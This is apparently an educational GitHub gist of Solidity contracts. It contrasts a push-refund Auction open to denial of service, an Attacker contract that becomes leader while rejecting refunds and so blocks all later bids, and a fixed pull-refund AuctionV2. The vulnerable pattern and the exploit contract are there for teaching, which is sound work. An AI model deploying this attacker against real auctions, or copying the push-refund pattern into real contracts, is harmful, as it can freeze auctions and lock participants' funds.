
@ViktorKuzmanov
Created September 6, 2022 09:18
Perform DoS attack. Auction is a contract vulnerable to a DoS attack, and AuctionV2 solves this by using the pull-over-push pattern.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
/// @title Auction (push-refund variant)
/// @notice Highest-bid auction that refunds the previous leader from inside bid().
/// @dev The refund is pushed to `currentLeader` and bid() reverts when that
///      transfer fails, so every new bid depends on the previous leader accepting
///      ether. If the leader is an address that rejects plain transfers, no later
///      bid can succeed (denial of service). AuctionV2 in this file avoids this by
///      crediting refunds to a balance that the owner pulls later.
contract Auction {
    /// @notice Address holding the highest bid so far (zero address before the first bid).
    address payable public currentLeader;
    /// @notice Value in wei of the highest bid so far.
    uint public highestBid;

    /// @notice Place a bid; it must be strictly greater than `highestBid`.
    /// @dev Reverts with empty data when the bid is too low or when the refund
    ///      to the previous leader fails.
    function bid() public payable {
        if (!(msg.value > highestBid)) {
            revert();
        }

        // Push refund: send() forwards only the 2300-gas stipend and reports
        // failure as `false`. Reverting on that result is what ties this bid to
        // the previous leader's willingness to receive ether.
        if (!currentLeader.send(highestBid)) {
            revert();
        }

        // State is updated only after the external transfer succeeded.
        highestBid = msg.value;
        currentLeader = payable(msg.sender);
    }
}
/// @title Attacker (demonstration of the push-refund failure mode)
/// @notice Bids on an Auction from a contract that cannot receive plain ether.
/// @dev With receive() left commented out and no fallback defined, a plain ether
///      transfer to this contract fails. Once this contract is `currentLeader`,
///      Auction.bid() can no longer refund it, so that call reverts for everyone.
///      Takeaway for auditors: never make progress of a shared function depend
///      on a transfer to an address chosen by a participant.
contract Attacker {
    /// @notice The Auction instance this contract bids on; fixed at deployment.
    Auction public immutable externalContract;

    /// @param externalContractAddress Address of the deployed Auction contract.
    constructor(address externalContractAddress) {
        externalContract = Auction(externalContractAddress);
    }

    /// @notice Forward the ether attached to this call as a bid on the auction.
    /// @dev The bid is placed with this contract as msg.sender, so this contract
    ///      (not the caller) becomes the leader if the bid is accepted.
    function attack() public payable {
        externalContract.bid{value: msg.value}();
    }

    // Deliberately disabled: enabling this function would let the contract accept
    // the refund, and Auction.bid() would work again for later bidders.
    // receive() external payable {}
}
/// @title AuctionV2 (pull-refund variant)
/// @notice Highest-bid auction in which outbid leaders withdraw their own refunds.
/// @dev bid() makes no external call, so a leader that rejects ether cannot stop
///      later bids; a failing transfer in withdraw() affects only the caller.
contract AuctionV2 {
    /// @notice Address holding the highest bid so far (zero address before the first bid).
    address payable public currentLeader;
    /// @notice Value in wei of the highest bid so far.
    uint public highestBid;
    /// @notice Refund credit in wei owed to each outbid address.
    mapping(address => uint) public balances;

    /// @notice Place a bid; it must be strictly greater than `highestBid`.
    /// @dev Reverts with empty data when the bid is too low.
    function bid() public payable {
        require(msg.value > highestBid);

        // Pull over push: record what the outgoing leader is owed instead of
        // sending it, so nothing here can fail because of the recipient.
        address payable outbid = currentLeader;
        uint refund = highestBid;
        balances[outbid] = balances[outbid] + refund;

        highestBid = msg.value;
        currentLeader = payable(msg.sender);
    }

    /// @notice Withdraw the caller's accumulated refund credit.
    /// @dev Reverts if the caller is the current leader or if the transfer fails.
    ///      NOTE(review): the leader's live bid is tracked in `highestBid`, not in
    ///      `balances`, so the leader check only blocks credits from the leader's
    ///      earlier, outbid bids; confirm that this restriction is intended.
    function withdraw() public {
        require(msg.sender != currentLeader, "Current king cannot withdraw");

        // Checks-effects-interactions: clear the credit before the external
        // call so a re-entrant call to withdraw() finds nothing left to pay.
        uint owed = balances[msg.sender];
        balances[msg.sender] = 0;

        (bool ok, ) = msg.sender.call{value: owed}("");
        require(ok, "Failed to send Ether");
    }
}